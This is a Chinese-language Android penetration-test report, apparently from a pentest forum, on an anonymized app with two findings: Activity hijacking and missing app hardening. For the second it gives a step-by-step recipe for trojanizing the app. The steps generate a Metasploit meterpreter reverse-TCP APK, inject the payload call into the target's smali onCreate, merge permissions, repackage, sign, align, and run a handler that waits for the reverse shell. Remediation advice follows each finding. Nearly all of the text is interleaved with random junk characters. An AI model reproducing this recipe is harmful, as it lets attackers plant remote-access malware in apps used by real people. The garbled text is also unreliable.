9 v0 V3 o1 w( X / f7 M8 v) |+ p6 b7 D/ ]

, O! p7 E# ~( y+ H) C3 i5 x) X 5 c, ~! `0 x* Z: j6 g, L' P0 e   % W6 n: T, L. n/ B+ Q" \ b0 N 6 [; `3 F. T& g3 [

# y6 x: @- T1 l7 U6 u4 e 0 e) ?/ b7 }% b |3 v

7 {0 ~: Y5 L0 v3 P 0 [# X& q; z( t 2 检测结果                    8 I: p& H6 T4 Y r; q2 W 8 ~8 p+ o- {0 w0 U( m; ~8 n

( j& Q4 A! ]. V. f' D1 [2 R( v5 O% V) J! |5 a- C

8 ~1 D) ~7 p9 E& U - M2 q6 H3 H3 `; r% _+ `$ C h 2.1 某某某 0 M6 [0 y& a* _1 L8 f, \; D3 J . t% ?, v* b8 V% ~7 G

, t% _2 Q- a. x! W & ~& r5 l: T# j3 U

9 D; }" l: U& |2 D# n0 E3 j: x % v; B7 c, c/ s' P1 ~ 2.1.1检测目标 ' p A- M1 d1 h2 N! g: S; U0 m- z # m5 d0 g8 J: Z& W2 o" L

9 P. R: _* O' M ! Z- L: L8 L3 s7 b% r5 X

! s" y) V1 b6 u- m& U, v! J, y4 i# f0 O 目标地址: 某某某某某某APP 4 ?! k' l- c2 _7 g; d6 m; x ; l; s0 V) B5 Z( ~* |! `( {8 l# Q

% K) O( Y4 u P4 Z / H3 S2 f4 v6 h" n

) P' }" L; {! V4 d: a 1 }5 X& ]: p+ A/ {9 Y. R0 f5 O- l- Q 2.1.2检测结果 % q0 r3 R0 U. L7 R/ t$ |. ~' d r7 X1 ]1 A1 ^# m l" e8 |

' X6 w* f4 I9 V' w& ?# C 2 B4 T2 k0 P' N& Z" k7 d

# Y- ^( p- c7 r/ g6 Y& K4 E- r9 D, Y6 B9 x( P* M* ` 2.1.2.1 % y/ w! G# P) X/ g% o7 T; b2 A% {) `3 `/ f) r4 ~2 X4 E5 }/ Q

+ L& O6 U& o' ^9 s ; z2 O' P2 v" N

7 i1 Z3 N' L: [; p9 i' a( E3 V& L) S/ `. U 漏洞链接地址:某某某某某某APP - e; _& [/ {# S% R" b r! F: S. F5 R

2 s& V' g, i* A( H# U$ |$ J ?% x; s; @$ l3 s# l6 w

g* f" D0 _- L0 X / ~2 s, A0 T; s' D   G" w0 B# x0 V : `9 v \3 L3 v7 `+ g8 m

7 ~" s' a6 W% I 6 v& N6 H* u% O, _/ N0 V) W

# W% V, v8 O7 ` m 2 X: ~9 h) Z8 z2 p( o 漏洞分析及取证: $ q( z, k: g5 A9 _8 D6 f0 ] 1 t6 ~: P6 u& w! p+ P

' g; ^) A) f2 G0 q- ]/ M/ U 6 p3 \ {8 W5 h- I. ~7 R( i" m

( Z+ w4 r g- `3 P- R: c& V# h: K5 E2 x1 Z% t5 ^                  通过androidkiiler反编译,发现app未进行安全加固, Activity com.minivision.cmcc.activity.SubActivity可被劫持,复现漏洞如图: 6 l: q% ~) O# u % V% y3 m, ^$ v7 f8 q) K

: j# I5 ~7 }8 n- Q& F ) a4 ~ c% A* P* a, M

# L( f7 U3 t# Q3 z' I 2 |2 j" {! K* ^& d0 n& C      % D) }' E% H: o+ D, v* r) D" l" P; t. T8 f5 |

2 P/ d9 i4 z" Y 7 A/ H7 S) W4 B1 y s y

) g( @. T4 D; r) u# ]3 i ' l# t/ D& U9 i( d) _                       $ b5 t! C8 O1 P" m1 b 2 K4 K% S, u0 r. ]- U" R

! P) {5 s$ K; R% R# G# c9 T% V) p2 H5 j* y4 |. Z/ F% J: P

" J7 r2 y0 l% s6 {3 W4 h. R- Q, S + L1 ^8 U5 n; |- N5 y, J3 F3 P7 ` d& |: ^( b7 V

" [1 o* u3 h) @ j( N/ p! T " C5 X+ A% ^- t& a7 Q4 X& G/ A

. n" D D, t! z8 w" f" m- J 8 \" ?" G) C8 e; [1 I8 C! W - H( _3 E9 r- A1 b! k/ y, q5 {3 W # R2 b$ w- A# k/ Q4 z1 R

( y% A: e+ G2 W7 z5 n / r' w9 o) ]* R- j0 B

- I7 N3 w ^$ L4 T" _0 X- c$ J. q) }2 V2 |5 m1 f# k & }" o2 _3 @* y$ s1 z P: J# q 9 X. [3 J4 M3 C" X

h, H( I" V7 x Q7 R ) |; I& M& r5 Q

% B3 E: W3 a6 U: `% B5 G" B' u# T6 k6 B) U: \3 e% v g1 i 漏洞危害:高 : M" s& P m6 E" {0 \, H4 R H8 e5 e( e

6 I* l1 I, s/ c! } K8 Y 4 e$ e) G$ ` }
/ w7 K5 _3 H& l: A/ P& u, I- G ; {4 Y# B8 r/ V( K. t: {0 O2 }7 t# ] 0 A' Q+ [6 @% m( Z2 E1 \$ j! ]" ^) |. X' n* |' x) g# N, M6 H) D& A1 x/ q" i. {* a v! d3 D' F4 X" w( l0 D1 G9 s+ P& j3 g8 [: N' }# q l p! {- L2 G& @1 m! Y- a! \4 H1 l$ K0 m3 r/ {. g( v5 C/ r4 B2 H4 F1 q6 |4 q+ e V2 r$ y+ M5 q, u; k3 X) T+ k- S5 a; d# e9 d1 `7 h: N" ^: w; u' H |0 T J# w4 \( W% z, R- G5 y1 z6 d+ ~1 w( M% }& ~+ _! N) [6 \- M' ^8 J* S! J+ N- Q/ g/ g; o4 g) Y6 U6 _% ^; B" Q( H. `, O P: Y$ e% O2 H: i+ b* i' p# O9 o9 I" E6 |5 j0 z/ x7 h a, [ b- d& @, h, L7 \& I9 P+ y' j7 l7 ~8 O/ J* C8 M+ {' M+ q) d6 |* i# u4 T, ?. b1 \, a6 O* c# c( l9 R+ Q9 ]( |% W0 [) ^% E! }5 V: g% g ^5 ~4 |" F
* U- H# v9 ~7 Z6 l- g0 z. q 9 v# o0 D, G. v/ G- @

0 m2 @, ]/ ]3 w9 h1 W4 `, s# X7 Y' a / ?8 q* I- }2 J+ \4 U* a: g% G 严重程度 9 V1 g' [, [; j: Z4 v7 H$ F+ l' a& J, `) f. C; F" [8 N6 W2 J

% k: ^* U& I" y3 T* N- o$ q % U' `; O% [1 u
% F3 @, r7 w2 g7 R6 ]$ g; M1 U5 z' K1 X

! l$ b {* j( N% g 8 ]) c# m7 F! B$ F6 m0 t - b& r& h% C8 Z 2 \: F1 D+ j! ]

8 ]# N9 Z4 D+ C0 B& R ' y' e* E: ?" \: N9 d0 a
7 z. f2 v% o/ [ , Q; l6 ?% D. W

& c( A* R' ^- h& @2 L* A 6 t/ G. ^* e' s; Q & i4 t7 A6 U& v3 m' k' ?8 H . N2 ?, F- t# p- a6 w, ]" R

/ d( G) V9 Y! H3 X" D9 c' ]5 G) O I' Z2 r7 G
/ D- v6 Y( H6 z, z ( s* X2 A; h/ ^# J( ]

2 b O* r) a4 ~2 i0 a R ) I/ L/ K* S. x8 o0 g ! v: ` r+ o7 k: j% }/ S . d' }2 p; O) j, P

! p3 x6 c0 y" ~- U+ ], _ - J% u' ]6 b- ~- L
5 ^7 G* K0 _* G4 y( ]4 P3 G ) `8 q$ y/ y7 W2 d

8 p4 |- W9 M {/ N+ ~0 d" S- ^$ |! Z( Q1 Y' a, g5 i2 B   0 i6 t1 l$ L/ l9 |) D % R/ f; n F( r) f9 U" F

' I- i& ^2 r: t7 k4 @ - ?/ ]1 F3 X7 t% e& ~& g: X
" x5 \0 b( [6 B3 _0 v3 e& k. ^7 h$ u" t

. k$ ~- h9 {" Q: j A2 A5 T$ Y' O2 G% I; P1 q1 _6 |6 A3 B& } Q K4 V% b: L' B9 X" c, @* r1 X) Q 2 M# b3 Z1 X. b+ I# _. v: |

+ d7 B* J& R3 o3 L( B/ X8 _' y7 B! n* W& L
0 M( c. `# ^, {! ?4 K5 }% F e _7 Q( E

) \5 \! |+ H" `; k, u8 {+ f* e7 D0 g- ?2 ~+ @: M   9 ?/ x6 t. V# `/ O2 k% m' }" \0 y

0 ~5 E- P% e _ 1 R% j0 H8 }0 Z
- |! o6 |" w( c2 w, E - K' \. k3 X+ q3 f; r0 i
8 q' v& b! H+ L* [" R' k3 j 0 v; M4 j/ R! I8 @- I& r# ]( P

* ~9 f% |7 x6 c, s3 |0 Z 9 R8 `- P& C: D4 }( t5 o! S1 q) I$ T   $ W. y/ t5 |# m7 g , r7 x7 V$ q2 ?( J- E

' k+ V( n$ b1 _9 j. ]$ Y& [: } + a% P4 Z4 ]! R* Q4 h9 x# G% S+ v

* s) Q5 w6 d* B Z ; [' g6 L/ S, p' o [& z5 ]7 ? 修复方法:在 APP Activity 界面(也就是 MainActivity)中重写 onKeyDown 方法和 onPause 方法,当其被覆盖时,就能够弹出警示信息。判断程序进入后台是不是由用户自己触发的(触摸返回键或 HOME 键),如果是用户自己触发的则无需弹出警示,否则弹出警示信息。 ' O& S) k7 S: r9 H8 w3 a; V$ Z ) d- N/ t3 z/ x( Y0 \

% H1 a. g. P3 S & m5 K* z2 w) Z' w

& Z+ Z8 n3 ~6 y& z+ a $ `. ~4 `; N: I) k# P! F* G           & l f# ?9 O- ]7 n* H2 ], \ 5 v1 ^: @7 C0 x* S

0 A7 ?6 z- O7 F7 \1 d7 y, C; I0 N 7 s' B. t8 q4 m

5 z" z# ~; B+ f# R; c # T4 m+ B" U& d8 ?   . t6 Z6 l2 ?8 T% ? a9 q2 T 7 y5 X7 C4 P. D$ ^; H$ o

| _9 p1 v( {1 }5 E " N7 T, U4 J: f. V

& W; h) v" @# ]! S" G; H! `1 s% W 2.1.2.2 ) D! q u9 z. J0 L% B * U( T u3 T( C+ n$ Y) \, ~. \

, _0 f; v! o! w4 y* ?: l A! }! I; V2 A4 Y7 p, N

: N) H3 |3 h x1 A1 r , z' x$ V1 \/ |# M+ f3 Y 漏洞链接地址:某某某某某某APP " `( L6 q, Y. ? ; E4 m0 Q) s9 X6 D+ Z. }8 r

1 f! J- o' i) ^4 E0 O$ {9 Q ) C5 z8 W1 r5 ]0 x

; a8 r' n3 \( J, E1 h/ y . Z! y2 T* ~4 t) G! { 漏洞分析及取证: 2 G$ G. }7 b$ _0 v9 U 4 H- f/ [- l/ [

& O) ^* m" C; t# y# N / B- K* V: m( R* x8 ^5 _

* _4 T% j' a1 j6 j 1 v% R8 v& h& j# [2 E& I3 U% h# N                  通过反编译,发现程序未加壳加密,可直接反编译获取源码,经过测试可修改app代码捆绑木马或者植入广告等操作,复现详细方法如下: $ {9 z! u, V, o3 S1 S 2 _$ u# ~; M3 ^ i2 v( {3 W* }( t

- L: W: K# w% ?6 Q8 C 2 S: Z. C* k: j. Q+ `0 h, S

% _9 P" @/ b" ^" j , j/ C9 P) o6 B+ Y' ? Metasploit 生成木马 apk 7 ^7 b! ~0 O7 Q9 i" V# q7 H7 ?0 [% i. d4 ~. D0 U

+ w8 K% a/ d q1 P6 l - ~! J6 h0 X7 P% M) r1 S

1 _/ G% a" Q2 e- y- k$ d( @( ~' U 4 s/ C$ e3 ~+ I3 [5 I msfvenom -p android/meterpreter/reverse_tcp LHOST=192.xxx.x.x LPORT=4444 R > cockhorse.apk 4 C4 V0 |7 U/ m6 \ , x1 ~6 W3 e; C

4 @$ ^( } b7 g6 q# J $ I4 ?( g# l; _( d% P" y p1 O9 f

. \% R6 J9 r( D) e# V% T/ k 6 E: B, `* G) F, c- Y, g) L( h 反编译目标apk和木马apk ) A) s- I" P' c9 t1 c , b3 u$ E2 u' H6 `0 F. P' R% h9 e

) K( f& Q$ a* x6 W g0 L 7 \0 P9 o/ D( y3 P

( f( u j: p# ^ 0 d) L. Q5 \7 C, ]/ e3 B9 F apktool d target.apk
9 y! R; q+ E. Z/ c8 ] % A0 W' s4 B# @( r apktool d cockhorse.apk
+ g# G" u5 o( n: } - i/ i' U" s8 |- j! H1 b

( S; {0 a% N( j/ k : e" G, @/ O+ A$ M- P

+ V8 m) ^0 t4 b: X( D$ @" E. a 2 {1 _5 T8 s$ y: h, P# S( c+ }0 B 木马 apk 注入目标 apk 6 H3 j# h0 j6 m3 ^" D( o9 R B# ~0 [% i: [/ C

' g0 X G( x8 t+ x% q- x1 h 4 J( }$ _ ^7 d" a, p

# n, ?+ J! @- d; ]% [/ z 9 X8 b6 L, c7 b7 @/ j 在目标 apk 反编译生成的文件中找到启动 Activity smali 文件,并在 onCreate()方法中添加如下代码:
2 [! I/ E4 M$ R* d5 g % m1 }! s9 H6 x3 N' \ X# i3 [ invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V
8 M. L$ K) W u1 D* O ) G# P$ }2 }% }7 P; j e

0 E2 z$ _( y7 Y/ O* p6 Q6 N ( T; x# L# r' w. A

: Q3 g+ U! S" b z7 |& x) ?$ ]" n - Y7 J3 D2 t, \* w9 V c 将木马文件 AndroidManifest.xml 中的权限放到目标文件 AndroidManifest.xml 中,去除重复 " ]0 h5 N& N6 [5 v* e 3 ]1 n. j: A1 _& p2 P* n

% H; |+ S5 p" l( y/ k8 v4 S ' E. E; |! L/ w7 p

( [9 M3 m, R) r: N) u4 ~6 g' P8 |# X s ) I& k. K8 N8 c- c( A3 x8 }, ` 将木马文件的 smali 文件放到目标文件下,例如 com/metasploit 文件复制到目标文件 com/ * r- P/ B6 w& W+ q , l+ L$ k# Q- ~* T

) ]. b$ h9 p! t5 `# U . k7 u( F" v1 U. H

7 s; A5 v. W" a 4 C: y& ~% Z# m1 b 回编译生成最终 apk 3 u* G1 A- ~7 B) |0 U5 ]1 t3 V " Y- N/ Q: u/ t/ z

3 m( w9 U& `% S0 b4 K) O' B" f, }, B! }) Z+ }2 [ G7 i

' A: u* S9 M8 t5 p $ m1 ~( }" t0 o) y 重新打包 ) ^ [& O g( D; d. v0 V0 x8 Y5 R' e' y" h" k0 |! r* T, ~4 k

! Y$ p0 [# G1 v3 h' T/ T - X8 z% j l2 C5 @

% f7 C1 g4 e G# | ( N0 F/ {9 Y" v4 ]% I# Q apktool b -o repackage.apk target_app_floder + r1 f' W7 |/ `8 [7 L / m( Z: h% q F; E

8 x) r) ~5 n$ v5 A9 ?* J $ R) {7 v( j* Q% j

; y) m* s2 t4 n9 ~2 U2 c# t ! {5 s( s8 [# B$ M3 n" x 创建签名文件,有的话可忽略此步骤 ' T$ q; P! \5 z8 F ; l; E6 N% `: V8 ]- U3 s* D6 M

1 u# K$ t% g6 b3 I, `( V6 h b( A* }9 D& Q6 m9 E9 T3 B. R# v- r& `8 n

/ J E; E- W+ A- z# C5 D$ V3 K ) Z5 `4 p2 s; P# x& ]4 l: b6 D keytool -genkey -v -keystore mykey.keystore -alias mykeyaliasname -keyalg RSA -keysize 2048 -validity 10000                : D/ h2 G+ e, V1 d; j9 L+ t l2 K- w* ^( @

# p4 ?4 g2 j/ N: x , U$ q& G( l: U% a# P

' y O, i4 R2 g/ j# }2 {5 |" g) M7 Z2 `6 H3 Z7 y 签名,以下任选其一 . R! l7 ^/ y& I - Z' u3 F# M$ L4 Y/ z, p7 b

1 ^8 o1 @. ` W `$ ?$ X 8 H3 E: T) e- \# j

+ w$ t% \; b) M" @0 _; C' _ 0 @8 K: P% |8 m" ?! T jarsigner 方式 : F- N7 b! c3 G |# Y. F/ B0 A3 b5 e. a6 I5 K4 _

: d; P9 A+ [4 U/ ?- H 3 h8 u, V# k5 s' s. g/ z

/ u5 F) x, Q s1 X4 L) A, t& h* }+ q: m- A' q! B1 Q; K3 W$ \ jarsigner -sigalg SHA256withRSA -digestalg SHA1 -keystore mykey.keystore -storepass 你的密码 repackaged.apk mykeyaliasname % a) U1 ^% P2 t! T# @* J# [' q1 }" X {/ V Y

8 w! K! [$ \) z* R) @/ a 2 M, g+ o1 ]' z9 Z# V

0 z& Q* a( c% R8 k9 ]( y) G6 X& @, d0 C/ L) c1 q: N. ~2 ^* o apksigner 方式 ' \4 S& f: n( ^& s6 J Z 5 K1 r2 j1 |% v5 H

; u5 y) ~0 I9 v( W* R) e% v& _ ' e4 ? s9 Z6 s/ A/ K: f0 ]

1 v; ]/ w4 V+ Z4 P ?' _* j1 Y! K apksigner sign --ks mykey.keystore --ks-key-alias mykeyaliasname repackaged.apk , Z6 \$ {6 b2 M( K * t+ n: }" z5 T: V* B) G& ?

) A( ^) _) ^/ ?+ |( N7 k% `; d- @2 Q: F9 `+ Y

& @- F8 O) B/ f% ` . S4 E& x- S( N! a b 如需要禁用 v2签名 添加选项--v2-signing-enabled false * Z- Q: X B6 ]' p+ R3 d, ~! q1 a $ l9 [4 l& \0 [3 a/ S

0 `0 }# S( O& k5 M& G/ z: b, D, x

8 x5 r2 l! }* i) u( ?; x" {4 P+ {3 M/ l: p 1 q) Z2 \# @, |" t* l( L& e4 } 验证,以下任选其一 + n; _" j- c# Y7 N* J5 g$ B ^$ Q7 m' T$ Y: L; q1 |

$ @$ _7 r, y( [6 @8 l8 e7 p, p " ^$ _5 Z3 i8 R, C, M/ E7 h9 W

1 S# }" C1 w2 g' q0 b+ ~! |5 h5 B0 o' K5 {& s _2 | p) J5 ] jarsigner方式 ' z1 T/ u! w K7 c" [ : r+ Z0 k7 w/ C3 C8 g, n) d

/ J+ A2 [: N X( n 3 A H5 g6 O) l) T. \

: ~$ X* Z6 m: q7 Q4 P8 v1 ]( Z ) J/ ~+ j9 A, N# p7 _; Z jarsigner -verify repackaged.apk ) ]" T$ n& I# g$ [1 w2 m 0 F) \$ r& U9 j* [

. C9 @0 h4 A% `1 w 6 t9 a. e) {3 Q8 I! J

) r7 g( u8 V4 a& Q0 ^+ U8 R6 }. w* A0 j. `+ t p' k apksigner 方式 & _& p3 k w R% M: f3 W) i7 n j+ V- B! X5 q/ ^

) |" e5 g4 ?$ q+ M; }" I5 W) Q# M3 }( _6 L" `, U i0 }

6 ]2 q7 K1 `2 l3 E+ G$ A' K; {$ a& I |3 R, ~2 U& _" Z apksigner verify -v --print-certs repackaged.apk - Z2 k- T0 f% p+ @7 {* o" n$ J; t) y' j% W

0 M0 f( F' S8 O* P ! K# d) Q6 F( F7 B) L& \, N: r' `( V

+ |! S3 c; F1 k- r7 g ; Q" ?" W+ L7 O% w) r keytool方式 , D/ k1 Z6 I- V8 @2 Z ( H+ N2 \4 a& Q! r3 N( s: J

9 X. U3 H- ^- R6 J) A0 j/ ]7 }8 Y- ]1 T( s$ Q1 Y

1 r3 E9 m3 D1 r( s# C- s" N ! N( T& v d7 T. m keytool -printcert -jarfile repackaged.apk 5 i4 [4 R' i6 ?1 y4 j M0 T , ^# B1 H" m) m1 Z

. L1 I, f( a& Z8 R) m" U0 v / o1 j2 o+ k' ~# w- X

5 }: ?$ L: l1 X& L& e ( B6 g+ m5 z1 j/ i% b 对齐 - R# Q, l+ A+ ~) p0 a7 V- } ! L# ^$ ~) d* I& m. v( k

4 V! b+ ?8 |/ P- K 3 j. j- Y; A# m8 F+ l4 u

# f1 {, M: g6 `- V/ e/ | * D X# j. E5 K, D/ ~3 e 字节对齐优化 ' N/ J5 z& B y. L0 n$ _: \5 U: l2 s' w; n( T0 t- }: t1 K2 ]

' s2 _$ Z& }! G f2 \" r6 q& J+ @3 p ! U2 ~' x+ [: @6 e% V' U2 z

+ n6 s! h; B9 d- ~ 5 |5 r9 ^- S6 R& R7 S zipalign -v 4 repackaged.apk final.apk 6 v7 [& N+ U: a5 o3 B4 U 5 L: T2 o' j6 P4 V# o9 h6 s2 C( Y

% U' X: k5 B& N( g+ E " D+ B/ D9 G$ j& i9 V$ E* K& k

! q- |# U5 ]0 Y/ I7 \4 c ' _' H+ S+ ]0 J4 a( i 检查是否对齐 5 o; z6 v- V. d3 p2 y* b+ g5 T7 B* k, R. Q6 K4 E

2 o3 @+ h; ]6 k" ?1 m, P' E V8 X7 X3 v% X1 g5 B

1 v& y0 v7 C3 C s2 {' \& l ; a; Z% V" \: T& _+ }3 N1 [ zipalign -c -v 4 final.apk 6 ^3 c( q% @0 \. n$ ~" m * Y- \" W X5 _+ V+ w

" j8 @5 d1 Z) C7 j3 Y7 C2 A 8 m! `+ P* m' O" \3 w( L+ P" s

3 o3 _1 J1 Z# Z* n 2 Z( T7 R* k" h, o! ?* u3 ] 注:zipalign可以在V1签名后执行,但zipalign不能在V2签名后执行,只能在V2签名之前执行 & `1 A1 N9 u% i. o J/ ~. s 4 J' T+ r1 E* Y+ K

( }3 y" o/ K) t- a" D5 c # o) h. A8 Z* q

! J/ x) k$ }* ^8 V+ t2 I% d + e. m# K% i" N4 e 启动Metasploit控制台,配置参数等待上线 ; e( q- g% a" \( j3 a# V) ]/ n7 o

R7 z G) k$ o ; `/ H) F9 b5 t1 |% j' u8 b8 ^

$ m* s7 ?+ h8 A3 B: b& g, H% p! u9 e r' r4 f 在终端依次输入如下命令 , [6 e5 L1 A2 d" X0 F0 C4 m: [ 6 m D; o: V5 p6 ?9 M' t! w' v

5 o3 D: V" [, l( u% G0 v" P# i0 Z& G. B$ B* N

: q2 S" Y5 } F# d4 P; S ' H6 K8 c# P' T; C. K' q msfconsole 7 q# c. ]1 q7 @ 7 r3 l6 K% c+ s6 x7 B; W, v, y

( \% T! p9 I! F& v : Z3 @9 f6 N- t% p' d

9 N% V* }5 R u) f/ I5 f ( ~5 d% s* k& Y use exploit/multi/handler k _% i Z) H6 ~/ ^( m2 h) s0 V

) |. l+ @& Z9 O4 f2 S5 A# V : `6 _! u) [ q9 N% Z% B

2 \# z; ~3 X% `0 R; W- l V+ j6 G : [0 h& f R' R1 f set PAYLOAD android/meterpreter/reverse_tcp . ?0 y& p& h# E+ }. j" v ) y0 t$ }7 Z0 \. U3 n/ S6 H

. g- y( v6 w! B" @+ ]3 _# G# p 6 E' Z0 z5 @8 D8 _+ p8 o

. d8 e9 g! Z5 b0 M2 D+ |; s 7 ]4 R9 M( ~- }/ P% g set LHOST 192.xxx.xx.xx $ N6 V8 H3 w! `8 k2 P1 v 9 w/ W: H0 M) x0 r" M" j

" K( v5 M3 P7 b) g x) Y& S. t / v" m; Q6 Z9 c- |* Q3 k) J

* C' V. P3 r5 Y/ P* J6 P: {) w2 F I5 N set LPORT 4444 . H$ J. X8 N, j! T# I $ @6 L& n9 S; X+ s) E; O( I% N

% D0 x3 b" {6 `$ f) p2 }) m$ Q0 s' s : X& U* D/ ` Z. a2 D# [# b

: z% Y! r" \# I. k( `7 o( T 0 s; O9 B: I3 g; I8 } exploit ) T D3 G9 A; e, \3 _' u9 g2 {: R. `( O! _' Q( U' t

4 v# L9 T" u8 `, g, o1 I; S+ Q 6 t4 R/ e& O4 b: _$ {5 M4 [9 V/ N

" Z" M8 k, q% Q# T2 }6 Q* z7 y. t' S9 u6 u, W1 l5 a* u$ o0 H9 M 之前我们把入口放在 MainActivity onCreate 方法中,当启动目标应用进入该界面,就会连接成功,如下图:               . i. j# h) E6 h* s" N9 a T+ n( B, Y 8 h# Q9 l! L6 X

" w' A/ c( q. I& a! U, y# n + i$ R+ C& X2 F6 u8 |+ q

# v: z% V" I0 o% c0 r- [; u 4 n5 w4 U) S8 H. J( ^ 漏洞危害:中 # D4 c8 x0 R3 e0 O3 u ' a$ _# @/ ?3 r

) q) Q' W$ i2 _; k) m. T4 L; U3 Q
7 y4 l& f# Z$ r/ O0 F* T& y Q; a2 U9 n, b , t. P" x9 h& s) K5 ?1 x ) K3 y, _" R' C$ ` 3 Z1 C6 g/ b0 @# D: j2 f% Y' V1 l! x1 s! A6 F. x7 Q7 R5 [. S' D! Q3 h! B! E, L: Z5 U* S$ N. _7 @6 D* y' a' y8 J$ D/ e2 x2 N4 V: _0 i8 n1 V0 l# W% `; B5 [! V& l# `) V: f: N% ?, @8 ]1 E# w# b, C4 G5 k0 o& _6 P7 m: v; P1 u% s2 T$ `. [$ x1 E* ~5 R5 y6 x# u3 Y7 p9 j+ Y9 ~! k5 l/ U! v( e9 m- Q% y/ l* B J1 M- V. @4 P8 i4 n3 s7 z) O+ `, ~& ?/ O( l% v/ ~5 U+ M" C" D% C- l4 L, C0 h9 _4 [: t$ p5 z" J+ f! T$ T# X+ g' e, n$ X7 z7 X' y) y9 I/ G6 ^. w& t6 W0 e! K' D6 N n7 h$ D% e0 j! F! |1 l3 N1 K( a3 o7 n4 n0 i/ P# F) P/ \2 m {3 W+ w6 G* y1 S& A6 v0 z5 e9 Q X8 h6 D8 d- ^, D
$ e4 @3 S% G. |2 c- M1 j# F5 w 8 w, P* N# l* a, r9 i# K! r

' V& r) R4 U4 G4 `9 G. ^6 ~- d1 J) ~, l9 B4 l7 h 严重程度 ! _8 A* x- p; w8 f; B & `8 ?+ m* q, h0 u+ B& R ^

) t* S- \9 J$ _. t - J) d$ _* F' U8 l# j" x
: S, d# U5 @4 Q7 s' L2 C D+ ]$ Q, l- K* V- {

; p9 M8 a; a: U1 v. d0 g# N 6 m+ z9 s( [) |0 a7 j4 T 9 U9 q8 Q5 k9 g! q& e; J9 H ' ?8 O! T) a' f+ a$ w

) A1 r9 c7 y6 p& _/ h; Y4 i9 P0 O; t' }' H. h
, F {& ?* t' m, }; |2 ]% h) Q + l# l# |7 ]& k' X% I9 y$ K

$ Q ~6 n1 U/ V& B8 B n+ z6 T1 U- h r ) @ r7 @, M ~; B- T0 n 2 r6 N; s- h: K+ @# y) I

" K4 p$ X& D, c& o# l1 Q" _5 B6 [" S3 G
/ G2 r5 F1 Y2 o ' z( g" \! [2 P8 }+ Z8 S4 S4 v

9 e# A* I' ?- P, {+ \: g . ?" j: T0 G; P" ^. _ 7 p8 s r$ ]4 O+ g7 t 3 c, P0 B0 k1 y& ^

y7 ?. B. S. G! d6 Y8 w4 l1 Y; X0 K9 s1 P4 F& F& ~
. F1 m" q; p0 A3 ~2 m9 m* _ 8 H' i0 Y# F8 n( f: x/ n* w # F; _# w5 l. ? % _8 `3 u: U8 F0 ~: G: H

8 E: i' m4 M" ?( g2 S- K : v0 i! m* e3 m( {0 k( o   # B! e! Q( J- s1 G" S' T5 N7 e; U" k 3 Q2 Q# }; f- N K

! N# v2 q; \# w! e0 d, k : u o% B4 p# u6 Z. f( H: b
2 d( f8 n4 I# L/ E i3 M+ Q 7 t* ~) M) E7 A8 `; P/ p4 E

8 e/ E- p7 }0 ]- x# s) Z 0 c9 T& S( o9 i% t3 I/ H ) q& ?) s) b/ R* V; j3 ^* Y8 { 1 a$ e4 F" j+ ]! d4 s

# i: Q5 K5 n% X5 c8 @3 G6 O* ]4 Q9 w2 Z% D/ p% {- D, X
. w; F7 B0 n: g! V+ j! v& ^$ a* r( L# u9 R( o & i& z, W& l, o2 l * Q& T+ S0 p; |. e/ p$ M

! u) A/ t% @% U1 J; \+ |& ^! k2 v5 T. i; U N7 j! Q5 x# c( L   % O" Z) e- V- N0 x- k7 }5 [ 6 T$ c( ?- I( J" t3 N. _

9 P1 `) k& u% r- f; u8 j+ D0 Z, K5 I' v) b3 _; Z4 B1 C [+ L
+ T5 N ^% d; r/ G6 i9 k 7 O, C& E" M2 R
, c9 T+ |% ^+ l f2 a- W f( J, s4 m* v+ n- b. a. S% {; n4 v

" k D" n6 w; |. H 6 @5 |) d" W; V2 P2 _# Q% A   2 D, W! n( f1 G# q- ? ' ~4 A$ a, r9 D* n

9 x. L1 Y8 U, q) x n" Q; B2 @/ b* L: f, f% J2 `+ a) n6 J: F; Y, I# `

$ k* @# O5 E& N7 h) g- V* o 8 }: T' M% d5 ]) M- G 修复方法: - W0 i ^- j; g. c6 H6 Y& X; I7 [ * N' l3 @ }$ h

; P0 g" o4 y) W' ? X 8 Y4 B' p8 u. q1 ]2 H) Y: B0 \' d

9 i/ \1 x/ t, p2 F1 A1 k % h- u* W, W1 R% o5 k; {; s               1. APP 启动时应做签名校验防止二次打包。
- S" |) Z4 |; R& P6 w0 p 7 U+ x6 o" d) p6 H: ] 2.
建议采用客户端、通信和服务器端联动防御方案进行安全防御。 @9 o/ K( V; c( m Z; ^% P( n5 z. |) A+ ]( v+ w- r- B: \4 [+ n7 p% ~

; x; W* j- R) L) J! Y, \; ^ 8 B x1 U" V b; `! N+ @1 ` ; q0 i; w2 S5 |1 ^ J ! t+ S/ H7 e! e- M( Q: Z' g

5 `/ p1 n1 F6 ~& g . D, E+ x. `0 O& }" H+ O   e* Y. G/ S8 i/ h& E/ a1 k " [- x* r5 _2 b j/ l6 s$ C0 \

# I: |. m) i: g" E, f% x: Z" q- R0 [3 n6 l1 G" Q 3 b+ _. H: X# z# }% q6 @. `) S& S: d8 S5 N2 y$ j

- c* g3 [5 {# ^) n- m0 ~ ) Z1 c& [* Z! E; a! n
5 E# c" W z$ q: U / R& Z! r( d' {% w: p

5 l' C* \! X q7 U' }. Z, g& O2 U' P6 k+ a8 ?, [. p





欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2